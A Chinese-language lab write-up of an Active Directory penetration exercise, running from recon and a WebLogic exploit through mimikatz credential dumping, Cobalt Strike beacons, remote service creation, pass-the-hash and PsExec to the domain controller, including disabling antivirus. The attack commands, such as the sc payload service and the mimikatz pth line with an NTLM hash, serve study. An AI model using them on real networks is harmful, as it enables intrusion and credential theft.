靶场环境
攻击机器:192.168.142.133(模拟外网)
PC机器:192.168.142.210(模拟外网)、192.168.140.210(模拟内网)
WEB机器:192.168.142.230(模拟外网)、192.168.140.230(模拟内网)
DC机器:192.168.140.220(模拟内网)
(1)通过arp-scan命令探测存活主机
arp-scan -l
(2)发现存在192.168.142.210、192.168.142.230存活,使用nmap进行端口探测
nmap -sV -Pn 192.168.142.210
nmap -sV -Pn 192.168.142.230
(3)发现192.168.142.230主机开放的web服务,尝试访问80端口,啥也没有,尝试访问7001端口
(4)使用Weblogic漏洞检测工具进行检测,成功发现漏洞
(5)尝试使用内存马注入,用冰蝎上线
(6)成功上线冰蝎
(7)只是普通域用户,需要提权,生成后门尝试上线到CS
(8)成功上线CS,通过CS进行提权
(9)没一分钟被360查杀了,尝试使用msf免杀,上传到WEB机器
(10)尝试了msf免杀,CS插件免杀、加壳等,一直被查杀。直接把360关了,以后学习了免杀再来对付。
(11)重新上线CS,继续往下探索。使用CS自带提权工具提权拿到system权限
(12)查看用户信息
(13)使用mimikatz抓取密码、NTLM哈希,直接抓到明文了(我记得Windows2012之后就已经抓不到明文了)
(14)拿到明文密码后,建立IPC连接进行横向
(15)测试是否可以远程查看文件夹
shell dir \\192.168.140.220\c$
(16)尝试计划任务、系统服务上线DC机器
方法一:使用系统服务上线(未成功)
shell copy candada.exe \\192.168.140.220\C$
shell sc \\192.168.140.220 create test binpath= "cmd.exe /c c:\candada.exe"
shell sc \\192.168.140.220 start test
方法二:使用计划任务上线(未成功)
(17)尝试PTH横向
方法一:使用mimikatz进行PTH横向(需要远程登录到WEB机器才能下一步操作),再通过todesk、gotohttp、rustdesk等远程工具或者3389远程控制进行操作
mimikatz sekurlsa::pth /user:administrator /domain:de1ay.com /ntlm:161cff084477fe596a5db81874498a24
方法二:使用CS自带的PTH直接上线,又出现了问题。我在address中没有发现存在192.168.140.220(DC机器),通过net view命令,也没办法探测。
(18)因为计划任务、系统服务都没办法成功上线DC机器,PTH、PTK、PTT攻击都需要配合计划任务或者系统服务上线DC机器,只能尝试其他横向的办法了。
尝试使用IPC配合PsExec上线CS
成功了,但是DC机器没有上线到CS,突然意识到,DC机器可能不出网,导致没办法回连。那之前计划任务、系统服务上线DC机器的没反应,有可能也是因为不出网的原因。
(19)目前掌握CS不出网的技术有SMB-Beacon上线、TCP-Beacon上线、http代理技术+端口转发技术、CS中转技术
SMB-Beacon上线(成功)
TCP-Beacon上线(失败)
http代理技术+端口转发技术(成功)
CS中转技术(成功)
(20)拿下域控后,PC机器通过IPC横向配合PsExec拿下
基本流程:
arp-scan主机探测-》nmap端口探测-》通过Weblogic工具发现漏洞并利用内存马注入-》通过冰蝎连接拿到shell-》上线CS进行提权-》通过system权限抓取密码-》拿到密码后IPC横向-》通过IPC横向配合计划任务-》系统服务上线CS-》发现DC机器不出网-》通过SMB-Beacon、TCP-Beacon、HTTP代理+端口转发、CS中转技术上线DC机器-》IPC横向+PsExec上线PC机器
不足:
(1)在打靶过程中,不会免杀技术,上传的CS马和msf马一下就被查杀。
(2)CS想通过PTH上线时,拿到了NTLM哈希值,但是发现找不到主机,net view命令也执行不了。